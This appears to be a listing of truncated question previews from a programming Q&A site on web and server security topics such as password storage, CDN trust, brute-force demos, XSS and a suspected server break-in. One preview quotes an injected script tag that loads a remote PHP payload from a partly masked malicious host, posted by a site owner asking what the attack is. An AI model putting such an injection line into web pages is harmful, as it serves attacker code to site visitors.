I've been reading about database security when it comes to websites. And it says an attacker could steal a database and then have as much time as he wants to get all the user's passwords. If an attacker stole the database, why would he need the passwords as the authentication is done in php? So he could just access all the user's informa...
We build sites that have a public (non-secured) area and secured (delivered over HTTPS) area and we use jQuery library. Recently I suggested we use Google CDN for jQuery delivery. Some of my colleagues expressed concerns in regards to security aspect of this way of delivering JavaScript libraries. For example, they mention the scenario ...
I'm coding a tool, that, given any URL, would periodically fetch its output. The problem is that an output could be not a simple and lightweight HTML page (expected in most cases), but some heavy data stream (i.e. straight from /dev/urandom, possible DoS attack). I'm using java.net.URL + java.net.URLConnection, setting connection and re...
I am doing a security presentation for my Computer and Information Security course in a few weeks time, and in this presentation I will be demonstrating the pros and cons of different attacks (dictionary, rainbow and bruteforce). I am do the dictionary and rainbow attacks fine but I need to generate the bruteforce attack on the fly. I ne...
Did anybody know more information about this attack ? I recently got this script injected in my web sites By the way dont go on this web site since it's the source of the infection </title><script src=http://google-stats50.**fo/***.php> What kind of attack is it, SQL or CODE ? By the way dont go on this web site since it's the ...
What are security issues in asp.net mvc?! and does MVC solved XSS and the others?! ...
We have a java application which runs inside apache/tomcat which connects to web service hosted on IIS /Windows 2003 R2. The connection is made over SSL. Recently to enhance security , we have moved the security provider in JRE from default sun libraries to libraries provides by RSA. After that we are not able to connect to webservice an...
I feel as if my server (ubuntu 10.4) has been attacked. I'm a bit of a linux noob. I run a website and a few rows of mysql data have been deleted. This has happened three times now. The auth log is empty prior to 2:00pm ET today. All that shows prior to my logins were a few cronjobs running. The data disappeared between 7pm and 10p...